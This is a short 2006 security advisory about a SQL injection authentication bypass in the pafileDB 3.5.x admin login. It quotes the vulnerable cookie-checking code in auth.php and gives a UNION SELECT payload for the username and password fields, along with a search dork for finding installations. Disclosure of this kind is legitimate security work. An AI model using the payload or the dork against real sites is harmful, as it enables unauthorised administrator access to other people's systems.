PafileDB Login SQL injection =)

2006-12-09T00:00:00
ID SECURITYVULNS:DOC:15351
Type securityvulns
Reporter Securityvulns
Modified 2006-12-09T00:00:00

Description

PafileDB Login SQL injection =)

author : koray & manyak@mypower.org

Risk : High

Class : Remote

Vulnerable Script : pafileDB

Version : 3.5.2 / 3.5.3

google : powered by pafiledb 3.5.3/2

greetz : www.cigicigi.net & redhackers

Vulnerable; include/admin/auth.php

c0de ; if (isset($_COOKIE['pafiledb_user']) && isset($_COOKIE['pafiledb_pass'])) { //If the cookie exists, do all this:

$admininfo = array();
if (checkpass($_COOKIE['pafiledb_user'], $_COOKIE['pafiledb_pass'], $admininfo)) {
    //checkpass() returned true, so the user exists

    //$adminloggedin is a var used throughout the script to see if someone's logged in.
    $adminloggedin = true;
    $smarty->assign('admininfo', $admininfo[0]);

} else { //The cookie exists, but the user/pass don't match

...

username : 1%20union%20select%%20201,2,3,4/ password : 1%20union%20select%%20201,2,3,4/ /

pafile/pafiledb.php?action=admin logged...